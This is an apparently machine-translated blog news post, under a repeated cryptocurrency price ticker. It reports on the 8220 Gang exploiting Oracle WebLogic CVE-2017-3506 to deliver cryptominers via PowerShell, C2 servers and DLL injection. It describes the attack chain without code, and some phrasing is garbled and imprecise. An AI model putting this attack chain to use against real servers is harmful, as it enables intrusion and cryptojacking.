BTC $56467.7606
ETH $3253.8540
BNB $398.7341
SOL $111.1323
XRP $0.5595
ADA $0.6196
AVAX $39.5019
DOGE $0.0944
TRX $0.1415
wstETH $3768.4138
LINK $19.2494
DOT $8.0939
WETH $3247.8854
MATIC $1.0471
UNI $10.9776
WBTC $56392.9022
IMX $3.3234
ICP $13.0706
BCH $299.1790
LTC $74.9403
CAKE $3.1855
FIL $8.0971
ETC $28.1455
LEO $4.3570
RNDR $7.3276
KAS $0.1690
DAI $0.9994
HBAR $0.1113
ATOM $11.0879
INJ $38.4469
VET $0.0488
TON $2.1437
OKB $51.5614
STX $3.1744
LDO $3.5163
FDUSD $0.9990
TIA $17.5770
ARB $1.9410
XMR $133.8517
XLM $0.1197
NEAR $3.9764
GRT $0.2852
ENS $22.1991
MKR $2150.0106
WEMIX $2.0915
APEX $2.4252
THETA $1.9773
BTC $56467.7606
ETH $3253.8540
BNB $398.7341
SOL $111.1323
XRP $0.5595
ADA $0.6196
AVAX $39.5019
DOGE $0.0944
TRX $0.1415
wstETH $3768.4138
LINK $19.2494
DOT $8.0939
WETH $3247.8854
MATIC $1.0471
UNI $10.9776
WBTC $56392.9022
IMX $3.3234
ICP $13.0706
BCH $299.1790
LTC $74.9403
CAKE $3.1855
FIL $8.0971
ETC $28.1455
LEO $4.3570
RNDR $7.3276
KAS $0.1690
DAI $0.9994
HBAR $0.1113
ATOM $11.0879
INJ $38.4469
VET $0.0488
TON $2.1437
OKB $51.5614
STX $3.1744
LDO $3.5163
FDUSD $0.9990
TIA $17.5770
ARB $1.9410
XMR $133.8517
XLM $0.1197
NEAR $3.9764
GRT $0.2852
ENS $22.1991
MKR $2150.0106
WEMIX $2.0915
APEX $2.4252
THETA $1.9773
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • Script kiddy group 8220 The group has matured and accepted new user attacks

    Perhaps the cloud technology group has changed its goals in using Oracle technologies.

    Trend Micro specialists introduced a new general grouping 8220 (8220 Mining Group), during which hackers exploited a 6-year-old Oracle WebLogic vulnerability to deliver a cryptominer to an infected system.

    The attacks used vulnerability CVE-2017-3506 (CVSS: 7.4), which is present on the WLS Security component in Oracle WebLogic and allows distribution of remotely applied broadband commands via an HTTP request with a specially crafted XML document. The flaw makes it possible to gain unauthorized access to confidential data or compromise the system.

    The 8220 exploited the HTTP URI "wls-wsat/CoordinatorPortType" to infiltrate the system. After logging in, the hackers delivered a PowerShell script that downloaded an executable file (including cryptominers) from the IP address of the command and control server (C2 server).

    The upload file loads a DLL that is injected into the MS Build process. The DLL file is securely obfuscated to make it harder for analysts to work. The DLL configuration information is Base64 encoded, the new linking process is performed by three C2 servers using the same TCP port 9090, 9091 or 9092 to download the cryptominer.

    In recent attacks, the group also used "lwp-download", a Linux utility to download a file from a specified URL. Observers have also observed the use of this utility to hack Windows systems.

    Abuse of "lwp-download" can be expected in the short term to compromise and target another platform. Despite the reuse of tools and C2 servers, the 8220 group began to attack the Windows system and use new files and C2 servers to bypass detections.

    Earlier, security investigators from Fortinet FortiGuard Labs reported that the 8220 Gang cryptominer group is delivering a new ScrubCrypt encryptor to the system, and cryptojacking has been received. The chain of attacks begins with the exploitation of Oracle WebLogic servers to download PowerShell scripts hosting ScrubCrypt.

    Experts name 8220 low-skilled financially motivated hackers who penetrate AWS, Azure, GCP, Alitun and QCloud hosts using vulnerabilities in Docker, Redis, Confluence and Apache. In addition, the group has its own cryptominer called PwnRig, based on the XMRig miner. PwnRig uses a fake FBI subdomain with an IP address pointing to a Brazilian government resource.

    Author DeepWeb
    SideWinder militantly masquerades as Pakistani and Chinese government agencies in their latest attacks
    FIN7 hackers are back with a new ransomvar Clop

    Comments 0

    Add comment